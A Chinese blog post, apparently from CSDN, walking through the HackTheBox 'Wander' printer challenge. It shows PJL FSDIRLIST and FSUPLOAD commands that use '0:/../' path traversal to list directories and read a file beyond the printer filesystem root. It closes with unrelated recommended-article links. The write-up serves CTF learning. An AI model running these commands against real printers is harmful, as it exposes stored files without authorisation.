HTB-Wander

最新推荐文章于 2024-05-15 22:57:28 发布
最新推荐文章于 2024-05-15 22:57:28 发布
阅读量5k 收藏
点赞数
分类专栏: HackTheBox 文章标签: 打印机安全 CTF 网络安全 靶机 HTB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/galaxy3000/article/details/122711978
版权

文章目录

概述

HackTheBox 是一个经典的在线靶机平台,提供了大量漏洞演练和CTF演练场景。

本次记录的是HTB Tracks 系列的 Intro to Printer Exploitation,即打印机相关漏洞的场景合集。随着攻防对抗的升级,打印机也成了的攻击目标之一。研究表明,打印机存在较多攻击面,使它们很容易遭受攻击。

在这里插入图片描述

声明

本文是对HackTheBox 专业靶场的演练记录,文中使用的工具和方法仅限学习交流使用,请不要将文中使用的工具和方法用于任何非法用途,请务必遵守《网络安全法》。

题目概述

本次靶机为Wander.,题目地址https://app.hackthebox.com/challenges/239
在这里插入图片描述

启动实例后,靶机地址为209.97.187.217:31608

访问http://209.97.187.217:31608/得到如下页面
在这里插入图片描述

点击Job Controls,得到如下页面
在这里插入图片描述
bing搜索关键字printer Job Controls @pjl info id
在这里插入图片描述

在https://developers.hp.com/system/files/PJL_Technical_Reference_Manual.pdf 的第九章JL File System中看到FSDIRLIST命令
在这里插入图片描述

题目解答

输入@PJL FSDIRLIST NAME="0:" ENTRY=1
在这里插入图片描述

接下来输入@PJL FSDIRLIST NAME="0:/../" ENTRY=1查看上一层目录,可以看到有etc、conf、home等目录
在这里插入图片描述
查看home目录@PJL FSDIRLIST NAME="0:/../home/" ENTRY=1,得到default目录,继续深入@PJL FSDIRLIST NAME="0:/../home/default" ENTRY=1
在这里插入图片描述
得到readyjob TYPE=FILE SIZE=457

接着使用图中的FSUPLOAD命令
在这里插入图片描述

@PJL  FSUPLOAD NAME="0:/../home/default/readyjob"

得到flag
在这里插入图片描述

galaxy3000
关注
专栏目录
HTB_Intro to Android Exploitation_Explore
weixin_44193247的博客
10-06 2049
HTB_Tracks_Beginner(4)
htb-beep
m0_55772907的博客
09-15 954
一般
HTB-Bastion
2201_75378806的博客
05-15 966
它存储虚拟机(VM)硬盘的内容,其中可能包括磁盘分区,文件系统,文件和文件夹。它是 Libguestfs 项目的一部分,该项目提供用于访问和修改虚拟机 (VM) 磁盘映像的工具。SAM 文件是 Windows 安全基础结构的关键组件,用于系统上的本地身份验证。检查器是一个可以自动检测映像中有关操作系统和磁盘结构的信息的工具。然而,在备份中它们是可以访问的,因为它们没有“使用中”。:指定要访问的虚拟机磁盘映像的路径。在这种情况下,路径指向位于指定目录的VHD(虚拟硬盘)文件。:指定磁盘映像应以只读模式安装。
htb-Bounty
2201_75378806的博客
05-15 1975
端口扫描该网站本身只是提供了一个向导的图像merlin.jpgf12 抓包响应标头表明该站点由以下人员提供支持ASP.NETgobuster -u http://10.10.10.93 -w usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30 -o gobuster_root -x aspx爆破目录呈现一个带有“浏览...”和“上传”按钮的简单表单:上传一个图片看看aspx shell 的副本,并尝试上传它。
qos-htb-开源
05-03
qos-htb是您一直在等待的简单带宽管理解决方案,graphix制作了图表,您可以在一秒钟之内查看到底谁在消耗带宽!
xml-HTB-开源
05-02
xml-HTB是用于自动生成bash脚本的工具,该工具可在Linux上设置HTB。 它使用xml配置文件。 它易于使用,具有许多功能:多种深度的类,可配置的叶子,u32和fw过滤器,可同时配置两个输入
HTB-Recon:Hackthebox计算机的自动侦查脚本(hackthebox.eu)
03-09
例如: ./htb-recon.sh 10.10.10.10. ServMon Windows ./htb-recon.sh 10.10.10.10. ServMon Windows 然后通过tmux a -t htb_recon附加会话 它能做什么 在您的主目录中创建一个工作区。 创建不同的文件夹以使事情...
HTB-Gen:脚本para gerar邀请de HackTheBox
03-29
HTB-Gen 脚本para gerar邀请de HackTheBox Windows / Linux Qualquer pessoa pode usar o script para fins lucrativos,para usar apenas tens abrir o teu Terminal / CMD dentro do diretorio do script depois...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8460
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
12306抢票脚本 - Bypass
最新发布
09-17
12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306
单片机与蓝牙模块的无线通信项目实战.md
09-17
如何使用单片机与蓝牙模块(如HC-05/HC-06)实现无线通信的详细步骤。首先,介绍了蓝牙模块的基本工作原理、引脚功能及配置方法。接着,讲解了硬件设计,包括单片机与蓝牙模块的连接、按键与LED模块的接线。然后,详细描述了软件设计,包括串口通信的初始化、蓝牙模块的数据接收与处理。项目调试部分涉及蓝牙连接的测试、串口通信的验证及功能调试,确保系统稳定运行。最后,探讨了项目的扩展可能性,如双向通信、多个设备通信及低功耗设计。这些内容为构建一个基于单片机和蓝牙的无线通信系统提供了全面的指导。
计算机科学中的基数排序算法原理与实现
09-17
本文详细介绍了基数排序这一非比较型排序方法的算法原理以及其在实际应用中如何操作。从初始化桶到最后重构阵列的每一步均进行了阐述,并提供了基于Python的实现例子。另外,对基数排序的时间和空间复杂度给出了深入解析及其使用情境说明,有助于了解排序机制并正确评估算法性能优劣。 适合人群:具备基本算法基础的数据科学家,研究和开发人员。 使用场景及目标:帮助理解和学习基数排序的技术要点和内在逻辑,掌握其实现在固定长度整数集合上进行快速排序的操作技巧。 其它提示:尽管该排序方法在特定条件下效率显著高于比较式方法,但须谨慎应用于数据种类变化多样的环境中。
Python100道题(100).zip
09-17
基数排序
基于大语言模型的智能体架构设计模式
09-17
本文档提出了一套由18种架构设计模式组成的设计模式目录,旨在指导从事基础模型(FM)驱动的人工智能(GenAI)开发的研究者与实践者们有效地克服现有挑战。它涵盖了被动目标创建者、主动目标创建者以及投票合作等多角度的解决方案,并详细讨论了每个设计模式的具体应用背景与解决相关问题的能力,从而支持基于FM的技术创新和发展,为实现自主型任务导向智能体提供坚实的理论基础和技术支持。适用于所有对智能体开发感兴趣的人群。 适合人群:具有一定编程基础且关注于智能体系统开发的研究员、软件设计师及开发者。 使用场景及目标:帮助相关人员深入理解当前先进基于基础模型的智能体发展趋势,在实际项目实践中更好地应对智能体的目标制定与行为规划方面的各种复杂情况。 额外说明:本研究不仅限于具体的技术实现细节,更多地强调从高层次视角探索设计思路和策略,促进跨学科协作及知识积累共享。
gradle61all000001
09-17
gradle61all000001
C语言实现一些linux命令_c-linux-command.zip
09-17
C语言实现一些linux命令_c-linux-command
吉他谱_Stranglehold - Ted Nugent.pdf
09-17
初级入门吉他谱 guitar tab
Java项目-基于SSM+Vue的网上花店设计管理平台的设计与实现(源码+数据库脚本+部署视频+代码讲解视频+全套软件)
09-17
【基于SSM+Vue的网上花店设计管理平台的设计与实现】高分通过项目,已获导师指导。 本项目是一套基于SSM+Vue的网上花店设计管理平台,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的Java学习者。也可作为课程设计、期末大作业 包含:项目源码、数据库脚本、开发说明文档、部署视频、代码讲解视频、全套软件等,该项目可以直接作为毕设使用。 项目都经过严格调试,确保可以运行!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值